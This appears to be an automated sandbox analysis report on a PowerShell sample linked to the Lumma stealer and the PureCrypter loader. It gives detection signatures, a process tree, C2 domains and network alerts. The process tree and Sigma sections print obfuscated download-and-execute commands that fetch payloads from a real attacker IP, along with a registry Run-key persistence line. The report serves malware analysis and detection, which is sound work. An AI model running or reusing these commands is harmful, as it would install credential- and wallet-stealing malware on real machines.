Edit tour

Windows Analysis Report
00.ps1

Overview

General Information

Sample name:	00.ps1
Analysis ID:	1591695
MD5:	8067bbe2706cbd02f6885c17c186e6cd
SHA1:	2d8e307684b8b5f8a8a68d5892db6879eaa69b25
SHA256:	44be296b2cbb2b21f81aa170020314425962a7e935678fbab1f4845e953aeecb
Tags:	asyncratlummastealerps1user-zhuzhu0009
Infos:

Detection

PureCrypter, LummaC, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected Powershell download and execute

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Detected PureCrypter Trojan

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Suspicious MSHTA Child Process

Suspicious powershell command line found

Tries to harvest and steal Bitcoin Wallet information

Tries to resolve many domain names, but no domain seems valid

Writes to foreign memory regions

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

powershell.exe (PID: 744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 6488 cmdline: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 3276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

powershell.exe (PID: 6528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7296 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

powershell.exe (PID: 1644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7328 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

svchost.exe (PID: 6416 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
PureCrypter	According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format	No Attribution	https://any.run/cybersecurity-blog/pure-malware-family-analysis/ https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/ https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/ https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter	https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["curtainykeo.lat", "kickykiduz.lat", "bloodyswif.lat", "miniatureyu.lat", "finickypwk.lat", "leggelatez.lat", "shoefeatthe.lat", "washyceehsu.lat", "savorraiykj.lat"], "Build id": "atxOT1--traff12"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3294615870.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 3276	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6528	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 1644	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegSvcs.exe PID: 7256	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegSvcs.exe PID: 7296	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Other

Source	Rule	Description	Author
amsi64_3276.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_6528.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_1644.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html, CommandLine: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 744, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html, ProcessId: 6488, ProcessName: mshta.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6488, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ProcessId: 3276, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", ProcessId: 744, ProcessName: powershell.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta vbscript:close(CreateObject("WScript.Shell").Run("powershell $L='(New-Object Net.We';$Y='bClient).Downlo';$V='adString(''http://92.255.57.112/1/2.png'')';$F=I`E`X ($L,$Y,$V -Join '')|I`E`X",0)), EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7256, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\(Default)

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", ProcessId: 744, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6416, ProcessName: svchost.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:09:12.652233+0100	2028371	3	Unknown Traffic	192.168.2.5	49711	104.102.49.254	443	TCP

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:09:18.345633+0100	2035595	1	Domain Observed Used for C2 Detected	92.255.57.112	56001	192.168.2.5	49714	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:09:11.848853+0100	2059189	1	Domain Observed Used for C2 Detected	192.168.2.5	57853	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curtainykeo .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:09:11.832910+0100	2059221	1	Domain Observed Used for C2 Detected	192.168.2.5	50383	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:09:11.980268+0100	2059191	1	Domain Observed Used for C2 Detected	192.168.2.5	58090	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:09:11.913322+0100	2059199	1	Domain Observed Used for C2 Detected	192.168.2.5	63101	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:09:11.887607+0100	2059201	1	Domain Observed Used for C2 Detected	192.168.2.5	64755	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:09:11.898821+0100	2059203	1	Domain Observed Used for C2 Detected	192.168.2.5	57974	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:09:11.932328+0100	2059207	1	Domain Observed Used for C2 Detected	192.168.2.5	58720	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:09:11.948087+0100	2059209	1	Domain Observed Used for C2 Detected	192.168.2.5	64529	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:09:11.867321+0100	2059211	1	Domain Observed Used for C2 Detected	192.168.2.5	56734	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:09:13.234585+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49711	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://92.255.57.112/1/3.png	Avira URL Cloud: Label: malware
Source: curtainykeo.lat	Avira URL Cloud: Label: malware
Source: http://92.255.57.112/1/2.png	Avira URL Cloud: Label: malware
Source: https://view-reserve.com/recaptcha-verify.html...	Avira URL Cloud: Label: malware
Source: https://view-reserve.com/recaptcha-verify.html	Avira URL Cloud: Label: malware
Source: http://92.255.57.112/1/1.png	Avira URL Cloud: Label: malware

Found malware configuration

Source: 13.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["curtainykeo.lat", "kickykiduz.lat", "bloodyswif.lat", "miniatureyu.lat", "finickypwk.lat", "leggelatez.lat", "shoefeatthe.lat", "washyceehsu.lat", "savorraiykj.lat"], "Build id": "atxOT1--traff12"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: finickypwk.lat
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: shoefeatthe.lat
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: savorraiykj.lat
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: kickykiduz.lat
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: miniatureyu.lat
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: leggelatez.lat
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: washyceehsu.lat
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: bloodyswif.lat
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: curtainykeo.lat
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: atxOT1--traff12

Source: unknown	HTTPS traffic detected: 92.255.57.120:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49711 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.Core.pdb_ source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 00000007.00000002.2407828166.0000022DFF6E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbT source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdbesv source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb1 source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdbessA source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbK source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: #.dll.pdb source: powershell.exe, 00000005.00000002.2129677364.0000024B803CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2321469926.0000024BF74D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D803CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D0803CA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbq source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0EE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdban0K source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb?"#v source: powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbX source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbV source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdbb\ source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h source: powershell.exe, 00000007.00000002.2400988982.0000022DFF04E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7BA6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF682000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbSt^K source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Core.pdbE source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdbpdblA source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7BA6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF6E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF682000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbl source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb- source: powershell.exe, 00000007.00000002.2407828166.0000022DFF693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb#{& source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp
